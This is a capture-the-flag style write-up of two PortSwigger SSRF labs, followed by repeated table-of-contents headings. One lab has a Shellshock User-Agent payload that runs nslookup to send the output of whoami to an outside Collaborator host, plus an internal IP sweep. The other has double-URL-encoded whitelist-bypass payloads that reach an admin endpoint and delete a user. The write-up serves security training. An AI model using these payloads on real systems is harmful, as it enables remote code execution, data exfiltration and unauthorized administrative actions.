Labs Covered

This write-up focuses on the following EXPERT-level labs from the PortSwigger Web Security Academy related to Server-side request forgery (SSRF):

6 Blind SSRF with Shellshock exploitation

This lab demonstrates how to exploit SSRF vulnerabilities combined with the Shellshock bug to execute remote code.

7 SSRF with whitelist-based input filter

This lab shows how attackers can bypass whitelist-based input filters to exploit SSRF vulnerabilities.

Lab Description

Solution

I accessed the lab and clicked on a product.
Using Burp Suite, I intercepted the request to analyze possible SSRF injection points.

2. Using Collaborator Everywhere

Enabled the Burp extension: Collaborator Everywhere, which automatically injects payloads into headers like User-Agent, Referer, etc.
Marked the lab as in-scope and browsed multiple pages to trigger different requests.
The Burp Collaborator received DNS callbacks from User-Agent and Referer headers, confirming an SSRF and possible OAST vector.

3. Preparing Shellshock Payload

As the lab required exploiting Shellshock, I searched online and found a [Cloudflare blog](https://blog.cloudflare.com/inside-shellshock/) detailing working payloads.

Final Payload (used in `User-Agent`):

I replaced /bin/eject with /bin/nslookup because I wanted the DNS lookup for the domain which contained the result of whoami and added $(whoami) before the Burp collaborator URL to see the output in the collaborator window. This was the final payload:

() { :;}; /bin/nslookup $(whoami).<my-collaborator-id>.oastify.com

4. Identifying the Vulnerable Internal Host

Lab description hinted the vulnerable internal server was at:
```
192.168.0.X:8080
```
I crafted requests with the above payload in the User-Agent header and started a Burp Intruder attack on the Referer header to test:
```
Referer: http://192.168.0.[1-255]:8080/
```

Setting Payload attack on intruder

While my intruder attack was running, I received a callback on the burp collaborator along with the OS user which when I submitted in the application solved the lab

LAB 7 - SSRF with whitelist-based input filter

Lab Description

Solution

1. Initial Attempt – Direct Access Blocked

I intercepted the Check Stock request and replaced the stockApi parameter value with:

http://localhost/admin

The server responded with:

External stock check must be stock.weliketoshop.net

This confirmed that the application was enforcing a domain whitelist.

2. Testing With Whitelisted Domain

I tried accessing:
```
 http://stock.weliketoshop.net/admin
```

Got a 500 Internal Server Error, suggesting the request reached the internal service but was misconfigured or incomplete.

3. Bypassing the Whitelist Using URL Parser Confusion

3.1. Injecting a Username Before the Host

I tested:
```
http://admin@stock.weliketoshop.net/
```

Server responded with 500 — good sign. The app accepted the format.

3.2. Using Fragment Injection With `#`

I tested:
```
http://admin#@stock.weliketoshop.net/
```

The server responded with:

External stock check host must be stock.weliketoshop.net

This implied the URL parser was seeing admin as the host and ignoring the rest (after #) as a fragment.

3.3. Trying URL Encoding

I encoded the # as %23:
```
http://admin%23@stock.weliketoshop.net
```
Still failed — the filter likely decoded it once.

3.4. Double URL Encoding

I double-encoded # as %2523:

http://admin%2523@stock.weliketoshop.net

Server returned 500, indicating that parsing was bypassed and the request was accepted.

4. Injecting `localhost`

Since admin wasn’t the goal, I replaced it with localhost:
```
http://localhost%2523@stock.weliketoshop.net
```

This triggered a 200 OK response and revealed the /admin path in the response body.

5. Accessing the Admin Interface

Appended /admin to the URL:

http://localhost%2523@stock.weliketoshop.net/admin

This revealed the deletion endpoint:
```
/admin/delete?username=carlos
```

6. Final Payload to Delete User

I submitted the final payload in the stockApi parameter:

http://localhost%2523@stock.weliketoshop.net/admin/delete?username=carlos

This triggered the deletion of carlos.
And lab is solved after deleting Carlos user

portswigger-all-labs

Complete PortSwigger Web Security Academy Lab Writeups Detailed, categorized solutions for every lab — from APPRENTICE to EXPERT — covering all 30 vulnerability types.

Labs Covered

LAB 6 - Blind SSRF with Shellshock exploitation

Lab Description

Solution

2. Using Collaborator Everywhere

3. Preparing Shellshock Payload

Final Payload (used in `User-Agent`):

4. Identifying the Vulnerable Internal Host

LAB 7 - SSRF with whitelist-based input filter

Lab Description

Solution

1. Initial Attempt – Direct Access Blocked

2. Testing With Whitelisted Domain

3. Bypassing the Whitelist Using URL Parser Confusion

3.1. Injecting a Username Before the Host

3.2. Using Fragment Injection With `#`

3.3. Trying URL Encoding

3.4. Double URL Encoding

4. Injecting `localhost`

5. Accessing the Admin Interface

6. Final Payload to Delete User

Labs Covered

LAB 6 - Blind SSRF with Shellshock exploitation

Lab Description

Solution

2. Using Collaborator Everywhere

3. Preparing Shellshock Payload

Final Payload (used in User-Agent):

4. Identifying the Vulnerable Internal Host

LAB 7 - SSRF with whitelist-based input filter

Lab Description

Solution

1. Initial Attempt – Direct Access Blocked

2. Testing With Whitelisted Domain

3. Bypassing the Whitelist Using URL Parser Confusion

3.1. Injecting a Username Before the Host

3.2. Using Fragment Injection With #

3.3. Trying URL Encoding

3.4. Double URL Encoding

4. Injecting localhost

5. Accessing the Admin Interface

6. Final Payload to Delete User

Final Payload (used in `User-Agent`):

3.2. Using Fragment Injection With `#`

4. Injecting `localhost`